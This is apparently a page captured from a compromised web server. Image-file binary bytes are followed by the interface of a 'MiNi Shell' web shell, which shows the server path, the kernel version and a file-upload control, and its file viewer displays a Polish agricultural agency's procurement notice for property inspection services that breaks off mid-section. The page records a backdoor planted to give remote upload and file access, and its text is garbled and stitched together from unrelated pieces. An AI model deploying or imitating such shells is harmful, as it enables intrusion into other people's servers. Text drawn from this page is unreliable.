JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210709/0010956002-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00109560 z dnia 2021-07-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi lustracji, monitorowania oraz obsługi nieruchomości wchodzących <br/>w skład Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu, przeznaczonych do zagospodarowania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi lustracji, monitorowania oraz obsługi nieruchomości wchodzących <br/>w skład Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu, przeznaczonych do zagospodarowania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-491e6d81-df15-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00109560</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011827/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi lustracji i monitorowania nieruchomości Zasobu WRSP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje znajdują się w Rozdziale XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.22.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 586051,03 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 420800,44 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczna części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi lustracji nieruchomości, monitorowania oraz obsługi nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa oraz lustracja nieruchomości związana z realizacją prawa pierwokupu z terenu powiatów: oławskiego, strzelińskiego, wrocławskiego, M. Wrocław, oleśnickiego.<br/>W ramach realizacji przedmiotu zamówienia przewiduje się:<br/>a)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do sprzedaży,<br/>b)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do oddania w dzierżawę, <br/>c)	przeprowadzanie lustracji w związku z przedłużeniem umów dzierżaw, w zakresie wywiązywania się dzierżawców z obowiązków umownych ,<br/>d)	przeprowadzanie lustracji gruntów, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na podstawie ustawy o kształtowaniu ustroju rolnego ,<br/>e)	przeprowadzanie lustracji nieruchomości w procesie ich nieodpłatnego przekazania,<br/>f)	przeprowadzania lustracji nieruchomości zgłoszonych do płatności bezpośrednich,<br/>g)	przeprowadzanie lustracji nieruchomości do spraw ich przekazania w trwały zarząd, <br/>h)	okazywanie nieruchomości przeznaczonych do sprzedaży lub dzierżawy,<br/>i)	sporządzanie protokołu z przeprowadzonych czynności w terenie zawierającego dokumentację fotograficzną, <br/>j)	dokonywanie odbiorów i wydawania nieruchomości na podstawie protokołów zdawczo- odbiorczych, <br/>k)	sporządzanie protokołów zdawczo-odbiorczych, <br/>l)	ustalanie danych osobowych bezumownych użytkowników nieruchomości, stanowiących Zasób Własności Rolnej Skarbu Państwa, <br/>m)	doręczanie wykazów i ogłoszeń dotyczących rozdysponowania nieruchomości do odpowiednich Urzędów Gmin, Sołectw i innych właściwych jednostek,<br/>n)	prawidłowej eksploatacji i odpowiedzialności finansowej za mienie udostępnione przez KOWR Wykonawcy dla celów należytego wykonania przedmiotu Umowy. <br/><br/>Powyższe usługi (w tym prace terenowe) będą wykonywane w czasie 150 godzin miesięcznie.. Zamawiający wymaga realizacji usług w biurze, mieszczącym się we Wrocławiu przy ul. Kunickiego 2 przez osobę wskazaną w ofercie Zamawiający dopuszcza możliwość świadczenia usług przez maksymalnie jedną osobę. <br/>Wykonawca będzie realizował usługi osobiście lub delegując do prac swojego pracownika lub pracownika podwykonawcy lub osobę, z którą wykonawcę łączy inny stosunek cywilno-prawny.<br/>Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w tym:<br/>a)	wyposażone stanowisko pracy biurowej z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>b) wysyłanie i odbiór korespondencji związanej ze świadczoną usługą,<br/>c)	kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>Zamawiający informuje, że w ramach zapewnienia nieodpłatnej obsługi organizacyjno-technicznej nie przewiduje udostępnienia do wykonywania usług własnych środków transportu. Wykonawca będzie realizował czynności przy użyciu własnych środków transportu wykonując miesięcznie około 3000 km. <br/>przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>Zamawiający wymaga od Wykonawcy posiadania umiejętności czytania map geodezyjnych wraz z odniesieniem ich treści w terenie oraz posługiwania się odbiornikiem GPS.<br/>Pozostałe warunki realizacji zamówienia opisane zostały w Specyfikacji Warunków Zamówienia oraz projekcie umowy stanowiącym załącznik do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70132,44 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-09-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %, <br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %, <br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi lustracji nieruchomości, monitorowania oraz obsługi nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa oraz lustracja nieruchomości związana z realizacją prawa pierwokupu z terenu powiatów: wołowskiego, średzkiego, trzebnickiego, milickiego.<br/>W ramach realizacji przedmiotu zamówienia przewiduje się:<br/>a)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do sprzedaży,<br/>b)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do oddania w dzierżawę, <br/>c)	przeprowadzanie lustracji w związku z przedłużeniem umów dzierżaw, w zakresie wywiązywania się dzierżawców z obowiązków umownych ,<br/>d)	przeprowadzanie lustracji gruntów, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na podstawie ustawy o kształtowaniu ustroju rolnego ,<br/>e)	przeprowadzanie lustracji nieruchomości w procesie ich nieodpłatnego przekazania,<br/>f)	przeprowadzania lustracji nieruchomości zgłoszonych do płatności bezpośrednich,<br/>g)	przeprowadzanie lustracji nieruchomości do spraw ich przekazania w trwały zarząd, <br/>h)	okazywanie nieruchomości przeznaczonych do sprzedaży lub dzierżawy,<br/>i)	sporządzanie protokołu z przeprowadzonych czynności w terenie zawierającego dokumentację fotograficzną, <br/>j)	dokonywanie odbiorów i wydawania nieruchomości na podstawie protokołów zdawczo- odbiorczych, <br/>k)	sporządzanie protokołów zdawczo-odbiorczych, <br/>l)	ustalanie danych osobowych bezumownych użytkowników nieruchomości, stanowiących Zasób Własności Rolnej Skarbu Państwa, <br/>m)	doręczanie wykazów i ogłoszeń dotyczących rozdysponowania nieruchomości do odpowiednich Urzędów Gmin, Sołectw i innych właściwych jednostek,<br/>n)	prawidłowej eksploatacji i odpowiedzialności finansowej za mienie udostępnione przez KOWR Wykonawcy dla celów należytego wykonania przedmiotu Umowy. <br/><br/>Powyższe usługi (w tym prace terenowe) będą wykonywane w czasie 150 godzin miesięcznie.. Zamawiający wymaga realizacji usług w biurze, mieszczącym się we Wrocławiu przy ul. Kunickiego 2 przez osobę wskazaną w ofercie Zamawiający dopuszcza możliwość świadczenia usług przez maksymalnie jedną osobę. <br/>Wykonawca będzie realizował usługi osobiście lub delegując do prac swojego pracownika lub pracownika podwykonawcy lub osobę, z którą wykonawcę łączy inny stosunek cywilno-prawny.<br/>Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w tym:<br/>a)	wyposażone stanowisko pracy biurowej z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>b) wysyłanie i odbiór korespondencji związanej ze świadczoną usługą,<br/>c)	kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>Zamawiający informuje, że w ramach zapewnienia nieodpłatnej obsługi organizacyjno-technicznej nie przewiduje udostępnienia do wykonywania usług własnych środków transportu. Wykonawca będzie realizował czynności przy użyciu własnych środków transportu wykonując miesięcznie około 3000 km. <br/>przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>Zamawiający wymaga od Wykonawcy posiadania umiejętności czytania map geodezyjnych wraz z odniesieniem ich treści w terenie oraz posługiwania się odbiornikiem GPS.<br/>Pozostałe warunki realizacji zamówienia opisane zostały w Specyfikacji Warunków Zamówienia oraz projekcie umowy stanowiącym załącznik do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70132,45 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-08-17 do 2022-08-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %, <br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %, <br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi lustracji nieruchomości, monitorowania oraz obsługi nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa oraz lustracja nieruchomości związana z realizacją prawa pierwokupu z terenu powiatów: górowskiego, głogowskiego, polkowickiego, lubińskiego, legnickiego.<br/>W ramach realizacji przedmiotu zamówienia przewiduje się:<br/>a)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do sprzedaży,<br/>b)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do oddania w dzierżawę, <br/>c)	przeprowadzanie lustracji w związku z przedłużeniem umów dzierżaw, w zakresie wywiązywania się dzierżawców z obowiązków umownych ,<br/>d)	przeprowadzanie lustracji gruntów, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na podstawie ustawy o kształtowaniu ustroju rolnego ,<br/>e)	przeprowadzanie lustracji nieruchomości w procesie ich nieodpłatnego przekazania,<br/>f)	przeprowadzania lustracji nieruchomości zgłoszonych do płatności bezpośrednich,<br/>g)	przeprowadzanie lustracji nieruchomości do spraw ich przekazania w trwały zarząd, <br/>h)	okazywanie nieruchomości przeznaczonych do sprzedaży lub dzierżawy,<br/>i)	sporządzanie protokołu z przeprowadzonych czynności w terenie zawierającego dokumentację fotograficzną, <br/>j)	dokonywanie odbiorów i wydawania nieruchomości na podstawie protokołów zdawczo- odbiorczych, <br/>k)	sporządzanie protokołów zdawczo-odbiorczych, <br/>l)	ustalanie danych osobowych bezumownych użytkowników nieruchomości, stanowiących Zasób Własności Rolnej Skarbu Państwa, <br/>m)	doręczanie wykazów i ogłoszeń dotyczących rozdysponowania nieruchomości do odpowiednich Urzędów Gmin, Sołectw i innych właściwych jednostek,<br/>n)	prawidłowej eksploatacji i odpowiedzialności finansowej za mienie udostępnione przez KOWR Wykonawcy dla celów należytego wykonania przedmiotu Umowy. <br/><br/>Powyższe usługi (w tym prace terenowe) będą wykonywane w czasie 150 godzin miesięcznie.. Zamawiający wymaga realizacji usług w biurze, mieszczącym się w Legnicy przy ul. Jaworzyńskiej 199 przez osobę wskazaną w ofercie. Zamawiający dopuszcza możliwość świadczenia usług przez maksymalnie jedną osobę. <br/>Wykonawca będzie realizował usługi osobiście lub delegując do prac swojego pracownika lub pracownika podwykonawcy lub osobę, z którą wykonawcę łączy inny stosunek cywilno-prawny.<br/>Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w tym:<br/>a)	wyposażone stanowisko pracy biurowej z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>b) wysyłanie i odbiór korespondencji związanej ze świadczoną usługą,<br/>c)	kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>Zamawiający informuje, że w ramach zapewnienia nieodpłatnej obsługi organizacyjno-technicznej nie przewiduje udostępnienia do wykonywania usług własnych środków transportu. Wykonawca będzie realizował czynności przy użyciu własnych środków transportu wykonując miesięcznie około 3000 km. <br/>przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>Zamawiający wymaga od Wykonawcy posiadania umiejętności czytania map geodezyjnych wraz z odniesieniem ich treści w terenie oraz posługiwania się odbiornikiem GPS.<br/>Pozostałe warunki realizacji zamówienia opisane zostały w Specyfikacji Warunków Zamówienia oraz projekcie umowy stanowiącym załącznik do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70133,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny 